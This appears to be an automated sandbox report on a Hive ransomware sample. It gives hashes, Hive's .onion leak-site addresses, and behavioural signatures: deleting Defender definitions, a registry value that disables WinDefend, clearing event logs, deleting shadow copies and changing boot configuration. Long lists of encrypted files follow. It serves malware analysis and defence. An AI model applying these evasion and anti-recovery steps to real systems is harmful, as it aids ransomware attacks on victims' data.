Analysis
-
max time kernel
117s -
max time network
16s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 15:06
Static task
static1
Behavioral task
behavioral1
Sample
d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe
Resource
win10-en-20211208
General
-
Target
d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe
-
Size
3.8MB
-
MD5
2a356b6024179ed7b7153fb7d92c2b44
-
SHA1
417799bfed158276d7fabe92fdaf8c53c642c77b
-
SHA256
d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f
-
SHA512
9947bb69a7099993b6e4cdc50375515557c6402d247fc661212e7ae84b836f6fe9f226b5bef7140efab91d8eea8f7d329c79e9f627b24b087838668c054d74b8
Malware Config
Extracted
C:\Bdfn_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2056 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 592 bcdedit.exe 1976 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0158071.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GRINTL32.DLL.IDX_DLL.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImageMask.bmp.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21305_.GIF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\MedianLetter.Dotx.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tijuana.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RIPPLE\THMBNAIL.PNG.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\css\cpu.css d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\TipBand.dll.mui d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-text.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02153_.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0157763.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\OLNOTER.FAE.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SUMIPNTG\Bdfn_HOW_TO_DECRYPT.txt d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Verve.xml.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\background.gif.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Media Player\de-DE\wmplayer.exe.mui d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Sakhalin.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287020.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14515_.GIF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR6B.GIF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Mail\fr-FR\WinMail.exe.mui d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\js\highDpiImageSwap.js d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_ja.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Lisbon.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ACCTBOX.POC.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGWEBPQT.XML.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\logo.png d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File created C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\Bdfn_HOW_TO_DECRYPT.txt d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\Bdfn_HOW_TO_DECRYPT.txt d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576black.png d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Windows Journal\Templates\Genko_1.jtp d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Almaty.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\dt.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02227_.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\mscss7cm_es.dub.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\Bdfn_HOW_TO_DECRYPT.txt d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\cloud_Thumbnail.bmp d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00913_.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana.css.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\EMAIL.XML.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PROGRAM.DPV.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\js\slideShow.js d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\Bdfn_HOW_TO_DECRYPT.txt d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLENDS\Bdfn_HOW_TO_DECRYPT.txt d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101862.BMP.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01473_.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1824 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2520 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exed7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exepid process 2088 powershell.exe 2176 powershell.exe 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1940 wevtutil.exe Token: SeBackupPrivilege 1940 wevtutil.exe Token: SeSecurityPrivilege 1276 wevtutil.exe Token: SeBackupPrivilege 1276 wevtutil.exe Token: SeSecurityPrivilege 1528 wevtutil.exe Token: SeBackupPrivilege 1528 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1272 wmic.exe Token: SeSecurityPrivilege 1272 wmic.exe Token: SeTakeOwnershipPrivilege 1272 wmic.exe Token: SeLoadDriverPrivilege 1272 wmic.exe Token: SeSystemProfilePrivilege 1272 wmic.exe Token: SeSystemtimePrivilege 1272 wmic.exe Token: SeProfSingleProcessPrivilege 1272 wmic.exe Token: SeIncBasePriorityPrivilege 1272 wmic.exe Token: SeCreatePagefilePrivilege 1272 wmic.exe Token: SeBackupPrivilege 1272 wmic.exe Token: SeRestorePrivilege 1272 wmic.exe Token: SeShutdownPrivilege 1272 wmic.exe Token: SeDebugPrivilege 1272 wmic.exe Token: SeSystemEnvironmentPrivilege 1272 wmic.exe Token: SeRemoteShutdownPrivilege 1272 wmic.exe Token: SeUndockPrivilege 1272 wmic.exe Token: SeManageVolumePrivilege 1272 wmic.exe Token: 33 1272 wmic.exe Token: 34 1272 wmic.exe Token: 35 1272 wmic.exe Token: SeIncreaseQuotaPrivilege 884 wmic.exe Token: SeSecurityPrivilege 884 wmic.exe Token: SeTakeOwnershipPrivilege 884 wmic.exe Token: SeLoadDriverPrivilege 884 wmic.exe Token: SeSystemProfilePrivilege 884 wmic.exe Token: SeSystemtimePrivilege 884 wmic.exe Token: SeProfSingleProcessPrivilege 884 wmic.exe Token: SeIncBasePriorityPrivilege 884 wmic.exe Token: SeCreatePagefilePrivilege 884 wmic.exe Token: SeBackupPrivilege 884 wmic.exe Token: SeRestorePrivilege 884 wmic.exe Token: SeShutdownPrivilege 884 wmic.exe Token: SeDebugPrivilege 884 wmic.exe Token: SeSystemEnvironmentPrivilege 884 wmic.exe Token: SeRemoteShutdownPrivilege 884 wmic.exe Token: SeUndockPrivilege 884 wmic.exe Token: SeManageVolumePrivilege 884 wmic.exe Token: 33 884 wmic.exe Token: 34 884 wmic.exe Token: 35 884 wmic.exe Token: SeIncreaseQuotaPrivilege 884 wmic.exe Token: SeSecurityPrivilege 884 wmic.exe Token: SeTakeOwnershipPrivilege 884 wmic.exe Token: SeLoadDriverPrivilege 884 wmic.exe Token: SeSystemProfilePrivilege 884 wmic.exe Token: SeSystemtimePrivilege 884 wmic.exe Token: SeProfSingleProcessPrivilege 884 wmic.exe Token: SeIncBasePriorityPrivilege 884 wmic.exe Token: SeCreatePagefilePrivilege 884 wmic.exe Token: SeBackupPrivilege 884 wmic.exe Token: SeRestorePrivilege 884 wmic.exe Token: SeShutdownPrivilege 884 wmic.exe Token: SeDebugPrivilege 884 wmic.exe Token: SeSystemEnvironmentPrivilege 884 wmic.exe Token: SeRemoteShutdownPrivilege 884 wmic.exe Token: SeUndockPrivilege 884 wmic.exe Token: SeManageVolumePrivilege 884 wmic.exe Token: 33 884 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 944 wrote to memory of 468 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 944 wrote to memory of 468 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 944 wrote to memory of 468 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 468 wrote to memory of 1036 468 net.exe net1.exe PID 468 wrote to memory of 1036 468 net.exe net1.exe PID 468 wrote to memory of 1036 468 net.exe net1.exe PID 944 wrote to memory of 564 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 944 wrote to memory of 564 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 944 wrote to memory of 564 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 564 wrote to memory of 1616 564 net.exe net1.exe PID 564 wrote to memory of 1616 564 net.exe net1.exe PID 564 wrote to memory of 1616 564 net.exe net1.exe PID 944 wrote to memory of 1860 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 944 wrote to memory of 1860 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 944 wrote to memory of 1860 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 1860 wrote to memory of 812 1860 net.exe net1.exe PID 1860 wrote to memory of 812 1860 net.exe net1.exe PID 1860 wrote to memory of 812 1860 net.exe net1.exe PID 944 wrote to memory of 624 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 944 wrote to memory of 624 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 944 wrote to memory of 624 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 624 wrote to memory of 1004 624 net.exe net1.exe PID 624 wrote to memory of 1004 624 net.exe net1.exe PID 624 wrote to memory of 1004 624 net.exe net1.exe PID 944 wrote to memory of 1168 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 944 wrote to memory of 1168 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 944 wrote to memory of 1168 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 1168 wrote to memory of 1320 1168 net.exe net1.exe PID 1168 wrote to memory of 1320 1168 net.exe net1.exe PID 1168 wrote to memory of 1320 1168 net.exe net1.exe PID 944 wrote to memory of 1640 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 944 wrote to memory of 1640 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 944 wrote to memory of 1640 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 1640 wrote to memory of 1632 1640 net.exe net1.exe PID 1640 wrote to memory of 1632 1640 net.exe net1.exe PID 1640 wrote to memory of 1632 1640 net.exe net1.exe PID 944 wrote to memory of 1460 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 944 wrote to memory of 1460 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 944 wrote to memory of 1460 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 1460 wrote to memory of 1392 1460 net.exe net1.exe PID 1460 wrote to memory of 1392 1460 net.exe net1.exe PID 1460 wrote to memory of 1392 1460 net.exe net1.exe PID 944 wrote to memory of 1896 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 944 wrote to memory of 1896 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 944 wrote to memory of 1896 944 d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe net.exe PID 1896 wrote to memory of 1284 1896 net.exe net1.exe PID 1896 wrote to memory of 1284 1896 net.exe net1.exe PID 1896 wrote to memory of 1284 1896 net.exe net1.exe PID 944 wrote to 